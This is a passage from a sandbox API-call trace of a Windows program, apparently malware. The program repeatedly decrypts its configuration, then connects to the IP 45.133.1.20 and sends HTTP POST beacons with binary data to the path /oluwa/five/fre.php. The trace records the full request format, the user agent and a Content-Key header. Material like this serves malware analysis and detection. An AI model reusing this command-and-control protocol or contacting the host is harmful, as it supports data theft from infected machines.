(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.900] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.902] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.903] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.903] GetProcessHeap () returned 0x6a0000 [0198.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0198.903] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0198.903] GetProcessHeap () returned 0x6a0000 [0198.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0198.904] GetProcessHeap () returned 0x6a0000 [0198.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0198.904] GetProcessHeap () returned 0x6a0000 [0198.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0198.905] GetProcessHeap () returned 0x6a0000 [0198.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0198.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.909] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.916] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0198.934] GetProcessHeap () returned 0x6a0000 [0198.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0198.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.935] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0198.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.936] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.937] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.937] GetProcessHeap () returned 0x6a0000 [0198.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0198.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.939] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0198.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.940] CryptDestroyKey (hKey=0x6ad020) returned 1 [0198.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.941] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0198.941] GetProcessHeap () returned 0x6a0000 [0198.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0198.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.942] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0198.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.943] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0198.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.944] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0198.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.945] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0198.945] GetProcessHeap () returned 0x6a0000 [0198.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0198.959] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0198.959] GetProcessHeap () returned 0x6a0000 [0198.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0198.959] socket (af=2, type=1, protocol=6) returned 0x518 [0198.959] connect (s=0x518, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0198.987] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0198.987] GetProcessHeap () returned 0x6a0000 [0198.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0198.987] GetProcessHeap () returned 0x6a0000 [0198.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0198.988] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0198.989] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0198.989] GetProcessHeap () returned 0x6a0000 [0198.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0198.989] GetProcessHeap () returned 0x6a0000 [0198.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0198.990] GetProcessHeap () returned 0x6a0000 [0198.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0198.990] GetProcessHeap () returned 0x6a0000 [0198.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0198.990] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0198.991] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0198.991] GetProcessHeap () returned 0x6a0000 [0198.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0198.991] GetProcessHeap () returned 0x6a0000 [0198.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0198.992] send (s=0x518, buf=0x6b5c98*, len=242, flags=0) returned 242 [0198.992] send (s=0x518, buf=0x6bb998*, len=159, flags=0) returned 159 [0198.992] GetProcessHeap () returned 0x6a0000 [0198.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0198.993] recv (in: s=0x518, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0199.059] GetProcessHeap () returned 0x6a0000 [0199.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0199.060] GetProcessHeap () returned 0x6a0000 [0199.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0199.060] GetProcessHeap () returned 0x6a0000 [0199.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0199.061] GetProcessHeap () returned 0x6a0000 [0199.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0199.062] closesocket (s=0x518) returned 0 [0199.063] GetProcessHeap () returned 0x6a0000 [0199.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0199.063] GetProcessHeap () returned 0x6a0000 [0199.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0199.063] GetProcessHeap () returned 0x6a0000 [0199.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0199.063] GetProcessHeap () returned 0x6a0000 [0199.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0199.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5a0) returned 0x518 [0199.066] Sleep (dwMilliseconds=0xea60) [0199.068] GetProcessHeap () returned 0x6a0000 [0199.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0199.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.069] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.077] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0199.092] GetProcessHeap () returned 0x6a0000 [0199.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5e38 [0199.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.093] CryptImportKey (in: hProv=0x6bec18, pbData=0x6c5e38, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0199.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.095] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.096] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.096] GetProcessHeap () returned 0x6a0000 [0199.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5e38 | out: hHeap=0x6a0000) returned 1 [0199.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.114] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0199.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.115] CryptDestroyKey (hKey=0x6ad020) returned 1 [0199.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.116] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0199.116] GetProcessHeap () returned 0x6a0000 [0199.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0199.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.118] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0199.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.119] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0199.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.120] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0199.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.121] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0199.121] GetProcessHeap () returned 0x6a0000 [0199.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0199.122] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0199.122] GetProcessHeap () returned 0x6a0000 [0199.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0199.123] GetProcessHeap () returned 0x6a0000 [0199.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0199.124] GetProcessHeap () returned 0x6a0000 [0199.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0199.124] GetProcessHeap () returned 0x6a0000 [0199.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0199.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.125] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.136] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0199.147] GetProcessHeap () returned 0x6a0000 [0199.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5c58 [0199.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.153] CryptImportKey (in: hProv=0x6bf278, pbData=0x6c5c58, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0199.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.157] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.158] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.159] GetProcessHeap () returned 0x6a0000 [0199.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5c58 | out: hHeap=0x6a0000) returned 1 [0199.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.160] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0199.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.162] CryptDestroyKey (hKey=0x6ad020) returned 1 [0199.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.163] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0199.163] GetProcessHeap () returned 0x6a0000 [0199.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0199.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.165] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0199.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.166] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0199.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.167] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0199.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.169] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0199.169] GetProcessHeap () returned 0x6a0000 [0199.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0199.169] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0199.169] GetProcessHeap () returned 0x6a0000 [0199.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0199.169] socket (af=2, type=1, protocol=6) returned 0x51c [0199.170] connect (s=0x51c, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0199.193] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0199.193] GetProcessHeap () returned 0x6a0000 [0199.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0199.194] GetProcessHeap () returned 0x6a0000 [0199.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0199.194] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0199.196] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0199.196] GetProcessHeap () returned 0x6a0000 [0199.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0199.196] GetProcessHeap () returned 0x6a0000 [0199.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0199.197] GetProcessHeap () returned 0x6a0000 [0199.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0199.197] GetProcessHeap () returned 0x6a0000 [0199.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0199.197] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0199.198] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0199.198] GetProcessHeap () returned 0x6a0000 [0199.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0199.198] GetProcessHeap () returned 0x6a0000 [0199.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0199.199] send (s=0x51c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0199.199] send (s=0x51c, buf=0x6bb998*, len=159, flags=0) returned 159 [0199.199] GetProcessHeap () returned 0x6a0000 [0199.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0199.199] recv (in: s=0x51c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0199.273] GetProcessHeap () returned 0x6a0000 [0199.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0199.274] GetProcessHeap () returned 0x6a0000 [0199.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0199.275] GetProcessHeap () returned 0x6a0000 [0199.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0199.278] GetProcessHeap () returned 0x6a0000 [0199.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0199.278] closesocket (s=0x51c) returned 0 [0199.279] GetProcessHeap () returned 0x6a0000 [0199.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0199.279] GetProcessHeap () returned 0x6a0000 [0199.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0199.280] GetProcessHeap () returned 0x6a0000 [0199.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0199.281] GetProcessHeap () returned 0x6a0000 [0199.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0199.281] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x920) returned 0x51c [0199.283] Sleep (dwMilliseconds=0xea60) [0199.285] GetProcessHeap () returned 0x6a0000 [0199.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0199.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.286] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.293] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0199.301] GetProcessHeap () returned 0x6a0000 [0199.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0199.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.302] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0199.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.303] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.304] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.304] GetProcessHeap () returned 0x6a0000 [0199.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0199.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.332] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0199.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.333] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0199.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.334] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0199.335] GetProcessHeap () returned 0x6a0000 [0199.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0199.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.342] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0199.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.343] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0199.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.344] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0199.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.345] StrStrA 